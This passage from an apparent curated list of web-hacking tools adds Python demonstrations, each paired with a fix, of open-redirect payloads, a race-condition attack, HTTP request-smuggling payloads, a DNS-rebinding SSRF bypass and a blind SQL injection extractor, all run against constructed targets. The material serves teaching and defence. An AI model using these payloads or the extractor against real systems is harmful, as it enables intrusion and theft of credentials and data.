<li><a href="https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_Cheat_Sheet.md">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-insecure-direct-object-references" class="anchor" aria-hidden="true" href="insecure-direct-object-references"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Insecure Direct Object References</h3>
<ul dir="auto">
<li><a href="https://github.com/Quitten/Autorize">Autorize</a> - Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily</li>
<li><a href="https://github.com/topics/idor">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-open-redirect" class="anchor" aria-hidden="true" href="open-redirect"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Open Redirect</h3>
<ul dir="auto">
<li><a href="https://github.com/r0075h3ll/Oralyzer">Oralyzer</a> - Open Redirection Analyzer</li>
<li><a href="https://github.com/BountyStrike/Injectus">Injectus</a> - CRLF and open redirect fuzzer</li>
<li><a href="https://github.com/Naategh/dom-red">dom-red</a> - Small script to check a list of domains against open redirect vulnerability</li>
<li><a href="https://github.com/devanshbatham/OpenRedireX">OpenRedireX</a> - A Fuzzer for OpenRedirect issues</li>
<li><a href="https://github.com/topics/open-redirect">for more tools </a> </li>
</ul>
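<p dir="auto">The fuzzers above throw lists of redirect payloads at parameters such as <code>next=</code>. The following is an added example, not code from this list or from any of the tools in it: it shows what those payloads look like and why the usual "starts with a slash or with our own host" check accepts most of them, beside a validator that decodes, normalises and compares the whole authority. <code>ALLOWED_HOST</code>, the payload set and both validators are constructed for this example.</p>

```python
from urllib.parse import unquote, urlparse

# Assumption for this example: the application only ever redirects to its own origin.
ALLOWED_HOST = "app.example.com"

# Constructed payload set modelled on what open-redirect fuzzers send to a ?next= parameter.
# The value says how a browser (or a downstream layer) ends up interpreting the string.
PAYLOADS = {
    "/account": "same-origin path (legitimate)",
    "https://app.example.com/logout": "same-origin absolute URL (legitimate)",
    "//evil.example/": "protocol-relative URL, leaves the origin",
    "/\\evil.example/": "browsers turn the backslash into a slash: //evil.example/",
    "https://app.example.com@evil.example/": "userinfo trick, the real host is evil.example",
    "https://app.example.com.evil.example/": "allowed host reused as a label under the attacker's domain",
    "/%2F%2Fevil.example/": "becomes //evil.example/ if any layer URL-decodes before redirecting",
    "javascript:alert(document.domain)": "inert in a Location header, live if the app does window.location = next",
}

LEGITIMATE = {"/account", "https://app.example.com/logout"}


def naive_is_safe(target: str) -> bool:
    """The check many applications ship with: relative paths and our own host are fine."""
    return target.startswith("/") or target.startswith("https://" + ALLOWED_HOST)


def strict_is_safe(target: str) -> bool:
    """Decode, normalise backslashes, then parse and compare the authority exactly."""
    # Validate the form a browser or a decoding proxy may see, not the raw string.
    candidate = unquote(target).replace("\\", "/")
    parts = urlparse(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative: scheme and the whole authority
        # (netloc includes userinfo and port) must match exactly.
        return parts.scheme == "https" and parts.netloc == ALLOWED_HOST
    # Relative: exactly one leading slash; "//host" would be protocol-relative.
    return candidate.startswith("/") and not candidate.startswith("//")


def audit(check) -> dict:
    """Run one validator over every payload; True means it would allow the redirect."""
    return {payload: check(payload) for payload in PAYLOADS}


def false_accepts(check) -> list:
    """Payloads a validator accepts even though they leave the allowed origin."""
    return [p for p, ok in audit(check).items() if ok and p not in LEGITIMATE]


if __name__ == "__main__":
    for name, check in (("naive", naive_is_safe), ("strict", strict_is_safe)):
        print(f"{name}: wrongly accepts {false_accepts(check)}")
```

<p dir="auto">The strict check rejects <code>http://</code> to the allowed host as well, which is deliberate: a redirect is the wrong place to permit a downgrade. Validating the decoded form costs a few false rejections of odd but harmless paths, which is the right trade for a redirect parameter.</p>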
<h3 dir="auto"><a id="user-content-race-condition" class="anchor" aria-hidden="true" href="race-condition"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Race Condition</h3>
<ul dir="auto">
<li><a href="https://github.com/compsec-snu/razzer">razzer</a> - A Kernel fuzzer focusing on race bugs</li>
<li><a href="https://github.com/racepwn/racepwn">racepwn</a> - Race Condition framework</li>
<li><a href="https://github.com/nccgroup/requests-racer">requests-racer</a> - Small Python library that makes it easy to exploit race conditions in web apps with Requests.</li>
<li><a href="https://github.com/PortSwigger/turbo-intruder">turbo-intruder</a> - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.</li>
<li><a href="https://github.com/TheHackerDev/race-the-web">race-the-web</a> - Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.</li>
<li><a href="https://github.com/topics/race-conditions">for more tools </a> </li>
</ul>
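<p dir="auto">The web tools above (turbo-intruder's gate, requests-racer, race-the-web) all do the same thing: prepare many requests, then release them at the same instant so every one of them passes a check-then-act window before any has acted. The following is an added example, not code from any of those tools, that reproduces the attack in-process against a constructed one-time coupon handler, alongside the fixed handler that does check and act under one lock. The <code>sleep</code> stands in for a database round-trip and is what makes the window wide enough to hit reliably.</p>

```python
import threading
import time


class CouponService:
    """Constructed one-time coupon redemption with a vulnerable and a fixed handler."""

    def __init__(self):
        self.redeemed = set()
        self.credited = 0
        self._lock = threading.Lock()

    def redeem_vulnerable(self, code: str) -> bool:
        # Check ...
        if code in self.redeemed:
            return False
        time.sleep(0.05)          # stands in for a DB round-trip: this is the race window
        # ... then act. Every request that passed the check while the window was open lands here.
        self.redeemed.add(code)
        self.credited += 10
        return True

    def redeem_safe(self, code: str) -> bool:
        # Check and act atomically (a database would use a unique constraint,
        # SELECT ... FOR UPDATE, or a conditional UPDATE ... WHERE redeemed = 0).
        with self._lock:
            if code in self.redeemed:
                return False
            self.redeemed.add(code)
            self.credited += 10
        time.sleep(0.05)          # slow work after the state change no longer matters
        return True


def race(handler, code: str, attackers: int = 20) -> int:
    """Fire `attackers` calls that start at the same instant; return how many succeeded.

    The Barrier plays the role of the 'gate' / last-byte sync in HTTP race tools:
    queue everything, then release it together.
    """
    gate = threading.Barrier(attackers)
    results = []

    def attacker():
        gate.wait()                       # every thread blocks here, then all go at once
        results.append(handler(code))

    threads = [threading.Thread(target=attacker) for _ in range(attackers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


def demo() -> tuple:
    """Returns (redemptions, credit) for the vulnerable handler, then for the fixed one."""
    vuln, safe = CouponService(), CouponService()
    vuln_ok = race(vuln.redeem_vulnerable, "WELCOME10")
    safe_ok = race(safe.redeem_safe, "WELCOME10")
    return vuln_ok, vuln.credited, safe_ok, safe.credited


if __name__ == "__main__":
    vuln_ok, vuln_credit, safe_ok, safe_credit = demo()
    print(f"vulnerable: {vuln_ok} redemptions, {vuln_credit} credited")
    print(f"fixed:      {safe_ok} redemptions, {safe_credit} credited")
```

<p dir="auto">Against a real application the same shape applies: the number of successful responses to N synchronised requests is the finding, and the fix lives in the data layer, not in the request handler's ordering.</p>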
<h3 dir="auto"><a id="user-content-request-smuggling" class="anchor" aria-hidden="true" href="request-smuggling"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Request Smuggling</h3>
<ul dir="auto">
<li><a href="https://github.com/anshumanpattnaik/http-request-smuggling">http-request-smuggling</a> - HTTP Request Smuggling Detection Tool</li>
<li><a href="https://github.com/defparam/smuggler">smuggler</a> - Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3</li>
<li><a href="https://github.com/BishopFox/h2csmuggler">h2csmuggler</a> - HTTP Request Smuggling over HTTP/2 Cleartext (h2c)</li>
<li><a href="https://github.com/defparam/tiscripts">tiscripts</a> - These scripts I use to create Request Smuggling Desync payloads for CLTE and TECL style attacks.</li>
<li><a href="https://github.com/PortSwigger/http-request-smuggler">HTTP Request Smuggler</a> - PortSwigger's Burp Suite extension for detecting HTTP request smuggling / desync vulnerabilities</li>
</ul>
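<p dir="auto">All of the tools above rely on one fact: a front end and a back end that frame the same bytes differently (one by <code>Content-Length</code>, the other by <code>Transfer-Encoding: chunked</code>) disagree about where the request ends, and the leftover becomes the prefix of the next request on that connection. The following is an added example, not code from smuggler, tiscripts or the PortSwigger extension: it builds the classic CL.TE and TE.CL payloads and parses each one both ways, so the smuggled prefix is visible as a return value. Both payloads and both parsers are constructed for this example.</p>

```python
# Constructed CL.TE payload: Content-Length frames 13 bytes, chunked framing ends at "0\r\n\r\n".
CL_TE = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 13\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"SMUGGLED"
)

# Constructed TE.CL payload: chunked framing covers everything, Content-Length stops after "8\r\n".
TE_CL = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example\r\n"
    b"Content-Length: 3\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"8\r\n"
    b"SMUGGLED\r\n"
    b"0\r\n"
    b"\r\n"
)


def parse_headers(raw: bytes) -> tuple:
    """Split the head from the rest; return ({lowercased name: value}, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers, rest


def read_chunked(data: bytes) -> tuple:
    """Decode one chunked body; return (body, bytes left over after the terminating chunk)."""
    body, pos = b"", 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)  # chunk-size, ignoring chunk extensions
        pos = end + 2
        if size == 0:
            while True:                               # skip trailer lines up to the empty line
                end = data.index(b"\r\n", pos)
                line, pos = data[pos:end], end + 2
                if not line:
                    return body, data[pos:]
        body += data[pos:pos + size]
        pos += size + 2                               # chunk data plus its CRLF


def split_request(raw: bytes, framing: str) -> tuple:
    """Return (body, leftover) as a server sees them when it trusts `framing` ('cl' or 'te')."""
    headers, rest = parse_headers(raw)
    if framing == "cl":
        n = int(headers["content-length"])
        return rest[:n], rest[n:]
    if framing == "te":
        return read_chunked(rest)
    raise ValueError(framing)


def framing_is_ambiguous(raw: bytes) -> bool:
    """True when both framing headers are present. RFC 7230 section 3.3.3 says Transfer-Encoding
    wins and the server MAY reject such a message; a front end should reject or normalise it."""
    headers, _ = parse_headers(raw)
    return "content-length" in headers and "transfer-encoding" in headers


def desync(raw: bytes, front: str, back: str) -> bytes:
    """Bytes the back end keeps buffered, i.e. the prefix glued onto the next (victim) request."""
    _, leftover_front = split_request(raw, front)
    assert leftover_front == b"", "front end would already have split this into two requests"
    _, leftover_back = split_request(raw, back)
    return leftover_back


if __name__ == "__main__":
    print("CL.TE leftover on back end:", desync(CL_TE, front="cl", back="te"))
    print("TE.CL leftover on back end:", desync(TE_CL, front="te", back="cl"))
```

<p dir="auto">The detection tools listed here do the same comparison with timing instead of a second parser: a payload whose back-end framing waits for bytes that never arrive produces a delayed response. <code>framing_is_ambiguous</code> is the check a hardened front end applies before forwarding anything.</p>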
<h3 dir="auto"><a id="user-content-server-side-request-forgery" class="anchor" aria-hidden="true" href="server-side-request-forgery"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Server Side Request Forgery</h3>
<ul dir="auto">
<li><a href="https://github.com/swisskyrepo/SSRFmap">SSRFmap</a> - Automatic SSRF fuzzer and exploitation tool</li>
<li><a href="https://github.com/tarunkant/Gopherus">Gopherus</a> - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers</li>
<li><a href="https://github.com/jobertabma/ground-control">ground-control</a> - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.</li>
<li><a href="https://github.com/micha3lb3n/SSRFire">SSRFire</a> - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects</li>
<li><a href="https://github.com/daeken/httprebind">httprebind</a> - Automatic tool for DNS rebinding-based SSRF attacks</li>
<li><a href="https://github.com/teknogeek/ssrf-sheriff">ssrf-sheriff</a> - A simple SSRF-testing sheriff written in Go</li>
<li><a href="https://github.com/SpiderMate/B-XSSRF">B-XSSRF</a> - Toolkit to detect and keep track on Blind XSS, XXE & SSRF</li>
<li><a href="https://github.com/Damian89/extended-ssrf-search">extended-ssrf-search</a> - Smart ssrf scanner using different methods like parameter brute forcing in post and get...</li>
<li><a href="https://github.com/KathanP19/gaussrf">gaussrf</a> - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl, and filter URLs with open-redirect or SSRF parameters.</li>
<li><a href="https://github.com/JacobReynolds/ssrfDetector">ssrfDetector</a> - Server-side request forgery detector</li>
<li><a href="https://github.com/RandomRobbieBF/grafana-ssrf">grafana-ssrf</a> - Authenticated SSRF in Grafana</li>
<li><a href="https://github.com/xawdxawdx/sentrySSRF">sentrySSRF</a> - Tool to searching sentry config on page or in javascript files and check blind SSRF</li>
<li><a href="https://github.com/knassar702/lorsrf">lorsrf</a> - Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods</li>
<li><a href="https://github.com/nccgroup/singularity">singularity</a> - A DNS rebinding attack framework.</li>
<li><a href="https://github.com/brannondorsey/whonow">whonow</a> - A "malicious" DNS server for executing DNS Rebinding attacks on the fly (public instance running on rebind.network:53)</li>
<li><a href="https://github.com/brannondorsey/dns-rebind-toolkit">dns-rebind-toolkit</a> - A front-end JavaScript toolkit for creating DNS rebinding attacks.</li>
<li><a href="https://github.com/FSecureLABS/dref">dref</a> - DNS Rebinding Exploitation Framework</li>
<li><a href="https://github.com/taviso/rbndr">rbndr</a> - Simple DNS Rebinding Service</li>
</ul>
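<p dir="auto">Half of this list is DNS rebinding tooling (singularity, whonow, rbndr, dref, httprebind), and the reason is a specific defensive mistake: an SSRF filter that resolves the hostname, approves the address, and then hands the hostname to an HTTP client that resolves it again. A rebinding server answers the first lookup with a public address and the second with an internal one. The following is an added example, not code from any of these tools: a fake resolver plays the rebinding server, the vulnerable filter returns the address it would really connect to, and the fixed version pins the address it validated. The names, the answer table and the IP addresses are constructed; the public addresses are chosen because Python's <code>ipaddress</code> classes the TEST-NET ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) as non-global, which would otherwise confuse the demonstration.</p>

```python
import ipaddress
from urllib.parse import urlparse

# Constructed answer table standing in for DNS. The rebinding name answers with a public address
# the first time and a loopback address on every later lookup, as a rebinding server does with a
# very short TTL.
_ANSWERS = {
    "api.partner.example": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.attacker.example": ["93.184.216.35", "127.0.0.1"],
}
_LOOKUPS = {}


def resolve(host: str) -> str:
    """Fake DNS: returns the next answer for `host`, sticking on the last one."""
    answers = _ANSWERS[host]
    n = _LOOKUPS.get(host, 0)
    _LOOKUPS[host] = n + 1
    return answers[min(n, len(answers) - 1)]


def reset() -> None:
    """Forget lookup history so each scenario starts with a fresh first answer."""
    _LOOKUPS.clear()


def is_public(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # is_global is False for RFC 1918, loopback, link-local (so 169.254.169.254), CGNAT and the
    # documentation ranges; multicast and reserved are excluded explicitly for clarity.
    return addr.is_global and not (addr.is_multicast or addr.is_reserved)


def fetch_target_vulnerable(url: str) -> str:
    """Validates the hostname's address, then lets the HTTP client resolve the name again.
    Returns the IP the client would actually connect to."""
    host = urlparse(url).hostname
    if not is_public(resolve(host)):          # lookup 1: the validation
        raise ValueError(f"{host} resolves to a non-public address")
    return resolve(host)                      # lookup 2: the real connection (time-of-check / time-of-use)


def fetch_target_pinned(url: str) -> str:
    """Resolve once, validate that address, connect to exactly that address and send the original
    name in the Host header / SNI. Returns the pinned IP."""
    host = urlparse(url).hostname
    ip = resolve(host)
    if not is_public(ip):
        raise ValueError(f"{host} resolves to a non-public address")
    return ip   # the client is told "connect to ip, Host: host" and never re-resolves


def blocked(fetch, url: str) -> bool:
    """True when `fetch` refuses `url`."""
    try:
        fetch(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    reset()
    print("vulnerable connects to", fetch_target_vulnerable("http://rebind.attacker.example/"))
    reset()
    print("pinned connects to   ", fetch_target_pinned("http://rebind.attacker.example/"))
```

<p dir="auto">Pinning the address also has to survive HTTP redirects: every hop's target must go through the same resolve-validate-pin step, since a <code>302</code> to <code>http://169.254.169.254/</code> is the other common way past a hostname check.</p>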
<h3 dir="auto"><a id="user-content-sql-injection" class="anchor" aria-hidden="true" href="sql-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>SQL Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/sqlmapproject/sqlmap">sqlmap</a> - Automatic SQL injection and database takeover tool</li>
<li><a href="https://github.com/codingo/NoSQLMap">NoSQLMap</a> - Automated NoSQL database enumeration and web application exploitation tool.</li>
<li><a href="https://github.com/0xbug/SQLiScanner">SQLiScanner</a> - Automatic SQL injection with Charles and sqlmap api</li>
<li><a href="https://github.com/RhinoSecurityLabs/SleuthQL">SleuthQL</a> - Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap.</li>
<li><a href="https://github.com/blackarrowsec/mssqlproxy">mssqlproxy</a> - mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse</li>
<li><a href="https://github.com/zt2/sqli-hunter">sqli-hunter</a> - SQLi-Hunter is a simple HTTP / HTTPS proxy server and a SQLMAP API wrapper that makes digging SQLi easy.</li>
<li><a href="https://github.com/ghostlulzhacks/waybackSqliScanner">waybackSqliScanner</a> - Gather urls from wayback machine then test each GET parameter for sql injection.</li>
<li><a href="https://github.com/NetSPI/ESC">ESC</a> - Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features.</li>
<li><a href="https://github.com/Keramas/mssqli-duet">mssqli-duet</a> - SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing</li>
<li><a href="https://github.com/Miladkhoshdel/burp-to-sqlmap">burp-to-sqlmap</a> - Performing SQLInjection test on Burp Suite Bulk Requests using SQLMap</li>
<li><a href="https://github.com/InitRoot/BurpSQLTruncSanner">BurpSQLTruncSanner</a> - Messy BurpSuite plugin for SQL Truncation vulnerabilities.</li>
<li><a href="https://github.com/sadicann/andor">andor</a> - Blind SQL Injection Tool with Golang</li>
<li><a href="https://github.com/mhaskar/Blinder">Blinder</a> - A python library to automate time-based blind SQL injection</li>
<li><a href="https://github.com/the-robot/sqliv">sqliv</a> - massive SQL injection vulnerability scanner</li>
<li><a href="https://github.com/Charlie-belmer/nosqli">nosqli</a> - NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.</li>
</ul>
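<p dir="auto">Several tools above (Blinder, andor, sqlmap's blind techniques) recover data through nothing more than a yes/no answer from the application. The following is an added example, not code from any of those tools, that shows the mechanism end to end on an in-memory SQLite database: a deliberately vulnerable lookup built by string concatenation, the same lookup with a bound parameter, and a boolean-based blind extractor that binary-searches the length and then each character of a value it never sees directly. The table, rows and the <code>admin</code> password are constructed for this example.</p>

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database; table and rows exist only for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "Tr0ub4dor&3"), ("guest", "guest")])
    return conn


def user_exists_vulnerable(conn, username: str) -> bool:
    """Deliberately vulnerable: the username is spliced into the SQL text."""
    query = f"SELECT 1 FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchone() is not None


def user_exists_safe(conn, username: str) -> bool:
    """Same check with a bound parameter; input can never change the query's structure."""
    row = conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


class BlindExtractor:
    """Recovers a string through a true/false oracle, the way boolean-based blind SQLi tools do."""

    SUBQUERY = "(SELECT password FROM users WHERE username = 'admin')"

    def __init__(self, conn, check):
        self.conn, self.check, self.queries = conn, check, 0

    def oracle(self, condition: str) -> bool:
        self.queries += 1
        # 'admin' exists, so the reply is exactly the truth value of `condition`;
        # the trailing comment swallows the closing quote the application appends.
        return self.check(self.conn, f"admin' AND ({condition}) -- ")

    def _search(self, expr: str, lo: int, hi: int) -> int:
        # Binary search for the integer value of `expr`, assumed to lie in [lo, hi].
        while lo < hi:
            mid = (lo + hi) // 2
            if self.oracle(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, max_len: int = 64) -> str:
        length = self._search(f"length({self.SUBQUERY})", 0, max_len)
        return "".join(
            chr(self._search(f"unicode(substr({self.SUBQUERY}, {i}, 1))", 32, 126))
            for i in range(1, length + 1)
        )


if __name__ == "__main__":
    conn = make_db()
    ex = BlindExtractor(conn, user_exists_vulnerable)
    print(f"extracted {ex.extract()!r} in {ex.queries} requests")
    print("against the parameterised query:", repr(BlindExtractor(conn, user_exists_safe).extract()))
```

<p dir="auto">About seven requests per character is what makes this practical; the time-based variants in the list replace the visible true/false with a <code>sleep()</code> inside the condition when the response body gives nothing away. Run against the parameterised lookup, the oracle never returns true and the extractor gets an empty string.</p>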
<h3 dir="auto"><a id="user-content-xss-injection" class="anchor" aria-hidden="true" href="xss-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>XSS Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/s0md3v/XSStrike">XSStrike</a> - Most advanced XSS scanner.</li>
<li><a href="https://github.com/evilcos/xssor2">xssor2</a> - XSS'OR - Hack with JavaScript.</li>
<li><a href="https://github.com/DanMcInerney/xsscrapy">xsscrapy</a> - XSS spider - 66/66 wavsep XSS detected</li>
<li><a href="https://github.com/Netflix-Skunkworks/sleepy-puppy">sleepy-puppy</a> - Sleepy Puppy XSS Payload Management Framework</li>
<li><a href="https://github.com/ssl/ezXSS">ezXSS</a> - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.</li>
<li><a href="https://github.com/mandatoryprogrammer/xsshunter">xsshunter</a> - The XSS Hunter service - a portable version of XSSHunter.com</li>
<li><a href="https://github.com/hahwul/dalfox">dalfox</a> - DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang</li>
<li><a href="https://github.com/epsylon/xsser">xsser</a> - Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.</li>
<li><a href="https://github.com/hahwul/XSpear">XSpear</a> - Powerful XSS scanning and parameter analysis tool &amp; gem</li>
<li><a href="https://github.com/hakluke/weaponised-XSS-payloads">weaponised-XSS-payloads</a> - XSS payloads designed to turn alert(1) into P1</li>
<li><a href="https://github.com/nccgroup/tracy">tracy</a> - A tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner.</li>
<li><a href="https://github.com/jobertabma/ground-control">ground-control</a> - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.</li>
<li><a href="https://github.com/nVisium/xssValidator">xssValidator</a> - This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.</li>
<li><a href="https://github.com/Den1al/JSShell">JSShell</a> - An interactive multi-user web JS shell</li>
<li><a href="https://github.com/LewisArdern/bXSS">bXSS</a> - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.</li>
<li><a href="https://github.com/whitel1st/docem">docem</a> - Utility to embed XXE and XSS payloads in docx, odt, pptx, etc. (OXML_XEE on steroids)</li>
<li><a href="https://github.com/bugbountyforum/XSS-Radar">XSS-Radar</a> - XSS Radar is a tool that detects parameters and fuzzes them for cross-site scripting vulnerabilities.</li>
<li><a href="https://github.com/rajeshmajumdar/BruteXSS">BruteXSS</a> - BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application.</li>
<li><a href="https://github.com/dwisiswant0/findom-xss">findom-xss</a> - A fast DOM based XSS vulnerability scanner with simplicity.</li>
<li><a href="https://github.com/fcavallarin/domdig">domdig</a> - DOM XSS scanner for Single Page Applications</li>
<li><a href="https://github.com/wish-i-was/femida">femida</a> - Automated blind-xss search for Burp Suite</li>
<li><a href="https://github.com/SpiderMate/B-XSSRF">B-XSSRF</a> - Toolkit to detect and keep track on Blind XSS, XXE & SSRF</li>
<li><a href="https://github.com/yaph/domxssscanner">domxssscanner</a> - DOMXSS Scanner is an online tool to scan source code for DOM based XSS vulnerabilities</li>
<li><a href="https://github.com/mandatoryprogrammer/xsshunter_client">xsshunter_client</a> - Correlated injection proxy tool for XSS Hunter</li>
<li><a href="https://github.com/Damian89/extended-xss-search">extended-xss-search</a> - A better version of my xssfinder tool - scans for different types of xss on a list of urls.</li>
<li><a href="https://github.com/Jewel591/xssmap">xssmap</a> - XSSMap is a Python3-based tool for detecting XSS vulnerabilities</li>
<li><a href="https://github.com/menkrep1337/XSSCon">XSSCon</a> - XSSCon: Simple XSS Scanner tool</li>
<li><a href="https://github.com/BitTheByte/BitBlinder">BitBlinder</a> - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities</li>
<li><a href="https://github.com/dxa4481/XSSOauthPersistence">XSSOauthPersistence</a> - Maintaining account persistence via XSS and Oauth</li>
